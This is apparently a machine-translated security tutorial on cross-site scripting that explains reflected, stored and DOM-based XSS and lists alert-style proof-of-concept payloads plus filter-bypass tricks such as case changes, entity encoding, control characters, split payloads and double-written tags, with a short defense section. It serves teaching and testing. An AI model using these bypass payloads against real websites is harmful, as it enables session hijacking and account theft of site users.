XSS (cross-site scripting attack) principle and use

table of Contents

1. XSS principle

2. XSS hazards

3. XSS test environment download

Four. XSS classification

1. Reflective XSS

2. Stored XSS

3. DOM type XSS

Five. The structure of xss

1. Use <> to construct HTML/JS

2. Pseudo Agreement

3. Generate your own event (html event)

4. Other labels and techniques

6. XSS deformation (must ask for interview)

1. Case conversion

2. Use of quotation marks

3. / instead of spaces

4. Enter

5. Transcode label attribute values

6. Split cross-site

7. Double write bypass single filter

Seven. XSS defense

8. XSS-challenge

---

1. XSS principle

       XSS is called Cross-site scripting, which should have been abbreviated as CSS, but because of the same name as CSS (Cascading Style Sheets), it was renamed XSS. XSS is mainly based on js to complete malicious attacks. js can operate html, css and browsers very flexibly.

        XSS injects the constructed code (JS) into the web page, and the browser interprets and runs this JS code to achieve the effect of a malicious attack. When the user visits the webpage injected by the XSS script, the XSS script will be extracted. The user's browser will parse this XSS code, which means that the user has been attacked. The simplest action for the user is to use the browser to surf the Internet, and there is a javascript interpreter in the browser, which can parse javascript, but the browser will not judge whether the code is malicious. In other words, the objects of XSS are users and browsers.

2. XSS hazards

• Steal various user accounts   
• Steal user cookie information, pretend to be a user and enter the website
• Hijack user sessions and perform arbitrary operations  
• Brush traffic, execute pop-up ads
• Spread worms

3. XSS test environment download

Through this practice environment, we will understand XSS, the download address, xss_test  , after downloading, it can be accessed by placing it in the root directory of the website

Four. XSS classification

1. Reflective XSS

       Reflected XSS is a non-persistent, parametric cross-site scripting. The JS code of the reflective XSS is in the parameters (variables) of the Web application, such as the reflective XSS of the search box. For the content we input will be output to the web page as it is, we can suspect whether there is a reflective xss.
       For example, in the search box, we submitted the number 2323 along with the form, intercepted the data packet, and found that the data 2323 was submitted to xss.php, and the submitted data 2323 was output to the web page as it is. Continue to check the source code of xss.php.

In the source code of xss.php, we found that the statement we submitted was output to the web page as it is, and the language of PhP was used. Then we thought that the input was output to the web page without filtering. Then we can submit the JS code,

Submit a string of pop-up JS code, as follows <script>alert(/xss/)</script>. The program automatically executes the pop-up operation when encountering the js code, which leads to the occurrence of reflective XSS

This is the reflective XSS!!

2. Stored XSS

       Stored XSS is persistent cross-site scripting. Persistence is reflected in the fact that the XSS code is not in a certain parameter (variable), but is written into a medium that can permanently store data such as a database or file. Stored XSS usually occurs in places such as message boards, where you leave a message at the location of the message board and write malicious code into the database.

       If there is a stored xss in the message board, we inject the js code. At this time, we have only completed the first step, writing the malicious code into the database. Because of the JS code used by XSS, the running environment of the JS code is the browser, so the browser needs to load the malicious XSS code from the server to actually trigger the XSS (run code). At this point, we need to simulate the identity of the website backend administrator to check the message.

3. DOM type XSS

       dom is the document object model. The attack payload modifies the DOM tree of the victim's browser page. Its special place is that the payload is executed by modifying the DOM tree locally in the browser, and will not be transmitted to the server, which makes DOM XSS more difficult to detect.

      Enter DOM type XSS

It means to intercept the characters after "message=" and output them to the web page

Submit data?message=2021, the browser outputs the data we submitted

Check the source code at this time, the source code has not changed, and then check the element, with the data we submitted, verifying that the dom-type XSS attack mentioned above is the DOM tree of the victim's browser page.

The same can submit js code

Five. The structure of xss

1. Use <> to construct HTML/JS

Construct js tags

<script>alert(/xss/)</script>

2. Pseudo Agreement

javascript: js代码       伪协议的方式构造XSS

You can put the pseudo protocol in the hyperlink of the html

<a href="javascript:alert(/xss/)">touch me!</a>   #点击超链接，即可触发XSS。

3. Generate your own event (html event)

       "Event-driven" is a relatively classic programming idea. Many events (such as mouse movement, keyboard input, etc.) occur in the web page, and JS can respond to these events. So we can trigger JS functions and XSS through events.

单击事件
<input type="button" onclick ="alert(/xss/)" value="点我! "> 
双击事件
<input type="button" ondblclick="alert(/xss/)" value="双击666">
悬停
<img src='./smile.jpg' onmouseover='alert(/xss/)'>
图片载入失败弹窗
<img src='#' onerror="alert(/xss/)">
按下键盘触发
<input type="text" onkeydown="alert(/xss/)">     

 

4. Other labels and techniques

We can also use other tags to trigger XSS.

点击提交就弹窗
<svg onload="alert(/xss/)">   #svg是html5中新出的标签，也是一个事件
焦点  自动聚焦  
<input onfocus=alert(/xss/) autofocus>  #鼠标自动聚焦到这个标签然后进行弹窗

6. XSS deformation (must ask for interview)

Some web pages filter the XSS, but we can bypass the filter detection by deforming the XSS.

1. Case conversion

The payload is case-converted. As in the following two examples.

<Img sRc='#' Onerror="alert(/xss/)"/> 
#alert是js语，所以只能转换img和src 

<A hREf="javaScript:alert(/xss/)">click me</A>

We can submit these two statements for testing

2. Use of quotation marks

HTML language is not sensitive to the use of quotation marks. Double quotation marks, single quotation marks, or no quotation marks can be used for html

<img src="#" onerror="alert(/xss/)"/>
<img src='#' onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/) />

3. / instead of spaces

You can use left slashes instead of spaces

<Img/sRc='#'/Onerror='alert(/xss/)' />  #alert(/xss/)使用斜线是为了尽量避免单引号的使用
<Img/sRc='#'/Onerror=alert('xss') />
<Img/sRc='#'/Onerror='alert(/AJEST/)' />

4. Enter

You can add Tab (horizontal tabs) and carriage returns in some places to bypass keyword detection.

<A hREf="j
avas
c
r
i
p
t:alert(/xss/)">click me!</a>

 

5. Transcode label attribute values

 

Transcode the tag attribute value to bypass filtering. The corresponding code is as follows

Letter ASCII code Decimal code Hexadecimal code

a 97 a a semicolon represents the end of encoding

e                101              &#101;                 &#x65;

 

• ASCII encoding reference   https://www.sojson.com/asciitable.html
• Hexadecimal encoding   https://www.convertstring.com/zh_CN/EncodeDecode/HexEncode
• URL encoding   https://www.w3school.com.cn/tags/html_ref_urlencode.html

 

For example, encode the tag attribute value of <A hREf="javaScript:alert(/xss/)">click me</A>, and encode a in decimal a and hexadecimal encodinga ; as follows

<A hREf="j&#97;v&#x61;Script:alert(/xss/)">click me</A>

Click, the same pop-up window

In addition, we can also insert control characters such as carriage return, line feed, and horizontal tab in the code

For the meaning of control characters in ASCII, please refer to https://blog.csdn.net/sxdtzhp/article/details/50993571

 

Tab    &#9;

Line break

Carriage return

SOH
(The control character in ASCI. SOH is the Start Of Header, which indicates the beginning of the title, optional, and has no effect, just the beginning of the data stream)

STX  #Beginning of text

 

 

 

What it looks like after encoding

<A hREf="&#01;j&#10;&#97;v&#x61;s&#9;c&#10;r&#13;ipt:alert(/xss/)">click me!</a>

 

 

6. Split cross-site

The core idea is to shorten a relatively long JS statement by splitting it across sites. Then submit them separately. For example, use <script>alert(/xss/)</script> for differential cross-site

	HTML~~~~~~~~~~~~`
    <script>z='alert'</script>      #第一次提交
	HTML~~~~~~~~~~~~`     	   
    <script>z=z+'(/xss/)'</script>  #第二次提交
	HTML~~~~~~~~~~~~`
    <script>eval(z)</script>        #第三次提交

You can leave a message three times. When these three messages are loaded on the same page at the same time, an XSS attack is triggered.

7. Double write bypass single filter

If you filter a character once, you can use double writing to bypass it. If the program filters the keyword <script>, then we can construct <sc<script>ript> to bypass the single filter.

Seven. XSS defense

1) Front-end, server-side, limit the length of string input.
2) Front-end, server-side, HTML escaping processing. Escape and encode special characters such as "<", ">". Replace characters with corresponding HTML entities
. The core of anti-XSS is to filter the input data.

3) The black and white list strategy, whether using input filtering or output coding, is a black|white list filtering for data information.

8. XSS-challenge

 

Pass the challenge of actual combat, portal-" XSS challenge of the xss-challenge

 

 

——Heart, if there is no place to live, it will be wandering everywhere